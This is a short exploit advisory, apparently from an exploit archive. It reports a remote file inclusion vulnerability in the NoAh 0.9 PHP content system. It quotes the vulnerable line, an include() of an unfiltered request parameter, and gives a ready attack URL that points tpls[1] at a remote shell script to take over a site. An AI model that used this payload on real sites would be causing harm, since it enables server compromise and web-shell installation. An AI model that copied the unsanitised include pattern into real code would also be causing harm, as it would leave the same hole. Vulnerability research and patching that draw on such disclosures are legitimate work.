id: 1838
date: 05/05/2007
title: NoAh <= 0.9 pre 1.2 (mfa_theme.php) Remote File Inclusion Vulnerability
author: kezzap66345
cves: 

=======================================================================
NoAh <= 0.9 pre 1.2 (mfa_theme.php) Remote File Inclusion Vulnerability
=======================================================================



##############################################################################################
##############################################################################################
#NoAh 0.9 The PHP Content Architect <=  Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
###################################################################################
#
#ERROR:noah/modules/noevents/templates/mfa_theme.php
#
<?php include($tpls[1]); ?>
#
#BUG:
#
#Example:http://site.com/path/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=[[Sh3LL
Script]]
#
##############################################################################################
#
#Special Thanks:##### x0r0n ##### ajan ##### siircicocuk
#####################################
##############################################################################################
##############################################################################################



#  0day.today [2023-03-25]  #